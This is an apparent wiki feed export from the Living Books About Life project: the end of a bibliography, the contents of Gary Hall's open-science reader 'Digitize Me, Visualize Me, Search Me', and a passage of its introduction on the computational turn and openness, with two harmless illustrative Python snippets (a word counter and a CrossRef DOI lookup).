(2010), ‘Interview With Jean-Claude Bradley: The Impact of Open Notebook Science’, ''Information Today'', September. http://www.infotoday.com/IT/sep10/Poynder.shtml. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2008), ‘Sunset for Ideology, Sunrise for Methodology?’, ''Found History'', March 13. http://www.foundhistory.org/2008/03/13/sunset-for-ideology-sunrise-for-methodology/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010a), ‘Where’s the Beef?: Does Digital Humanities Have to Answer Questions?’, ''Found History'', May 12. http://www.foundhistory.org/2010/05/12/wheres-the-beef-does-digital-humanities-have-to-answer-questions/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Scheinfeldt, T. (2010b), response to Dan Cohen, ‘Searching for the Victorians’, ''Dan Cohen''. October 5. http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;amp;utm_medium=feed&amp;amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;amp;utm_content=Google+Reader. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Shields, R. (2010), ‘Green Fatigue Hits Campaign to Reduce Carbon Footprint’, ''The Independent'', October 10. http://www.independent.co.uk/environment/climate-change/green-fatigue-hits-campaign-to-reduce-carbon-footprint-2102585.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Sterling, B. (2005), ''Shaping Things''. Cambridge, MA: MIT Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stolberg, S. G. (2009), ‘On First Day, Obama Quickly Sets a New Tone’, ''The New York Times''. January 21. http://www.nytimes.com/2009/01/22/us/politics/22obama.html. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swan, A. (2009), ‘Open Access and Open Data’, ''2nd NERC Data Management Workshop'', Oxford. February 17-18. http://eprints.ecs.soton.ac.uk/17424/. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Swartz, A. (2010), ‘When is Transparency Useful?’, ''Aaron Swartz’s Raw Thought blog'', February 11. http://www.aaronsw.com/weblog/usefultransparency. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Vaidhyanathan, S. (2009), ‘The Googlization of Universities’, ''The NEA 2009 Almanac of Higher Education''. http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wark, M. (2004), ''A Hacker Manifesto''. Cambridge, MA: Harvard University Press. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Westcott, S. (2009), ‘Global Warming: Brits Deny Humans are to Blame’, ''The Express'', December 7. http://www.express.co.uk/posts/view/144551/Global-warming-Brits-deny-humans-are-to-blame &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The White House (2009), ‘Memorandum for the Heads of Executive Departments and Agencies: Transparency and Open Government’. January 21. http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Wollen, P. and Cooke, L. (eds) (1995), ''Visual Display: Culture Beyond Appearances''. Seattle: Bay Press.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5506</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5506"/>
		<updated>2013-11-12T08:57:26Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are increasingly being used to produce new ways of approaching and understanding texts in the humanities – what is sometimes thought of as ‘the digital humanities’. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generational Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neurological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
;[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alessio Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavrs]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
;[http://prisom.me/ #PRISOM]&lt;br /&gt;
&lt;br /&gt;
;[http://givememydata.com/ Give Me My Data]&lt;br /&gt;
&lt;br /&gt;
;[http://commodify.us/ commodify.us]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, ''The Open Society and Its Enemies''&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5504</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5504"/>
		<updated>2013-11-03T15:06:41Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into ‘scientism’). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computing science and related fields and applying them to these humanities texts and artifacts – to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibbs’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; What ''Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these languages whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
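&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; It may help to make Lyotard’s point about learning being ‘translated into quantities of information’ concrete. Reduced to its computational core, the corpus mining practised by Cohen and Gibbs is exactly such a translation: digitized texts in, counts out. The following is only a toy sketch (in Python; the miniature corpus and the tracked term are invented for illustration, standing in for the thousands of digitized volumes a real project would read from disk): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Toy illustration of corpus text mining: tracking a term's frequency
# over time. The 'corpus' mapping of year to text is invented for
# illustration; real projects read thousands of digitized volumes.
from collections import Counter

corpus = {
    1851: "the revolution in science and in industry",
    1871: "science and faith in the modern age of science",
    1891: "the progress of science and of empire",
}

def term_counts(text):
    # Lower-case, strip punctuation and count tokens.
    tokens = [w.strip(".,;:!?") for w in text.lower().split()]
    return Counter(t for t in tokens if t)

for year in sorted(corpus):
    print(year, "science", term_counts(corpus[year])["science"])
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nothing in the counting itself decides what the counts mean, or what they are taken to legitimate; that remains the interpretative work with which this introduction is concerned. &lt;br /&gt;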
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment – in both the academy and society – in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, the Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer-reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost-effective mechanism for scholarly publishing. Others, meanwhile, have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
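&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The machinery beneath such citation-linking services is worth seeing at its plainest: each citation carries a DOI, and a public registry will resolve that DOI to structured, machine-readable metadata about the article. A minimal sketch follows (in Python, using the present-day public CrossRef REST API purely for illustration, rather than whatever interface Pubget itself relied on; the DOI is that of the PLoS Biology article linked elsewhere in this book): &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;pre&amp;gt;
# Resolve a citation's DOI to article metadata via the public
# CrossRef REST API. Illustrative only: this is a present-day
# interface, not the one PLoS and Pubget used in 2010.
import requests

doi = "10.1371/journal.pbio.0000036"  # 'Why PLoS Became a Publisher'
resp = requests.get("https://api.crossref.org/works/" + doi, timeout=30)
resp.raise_for_status()
work = resp.json()["message"]

print(work.get("title"))                   # article title
print(work.get("container-title"))         # journal name
print(work.get("is-referenced-by-count"))  # citations known to CrossRef
&amp;lt;/pre&amp;gt; &lt;br /&gt;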
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon. This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis endows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and, no doubt, to help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a 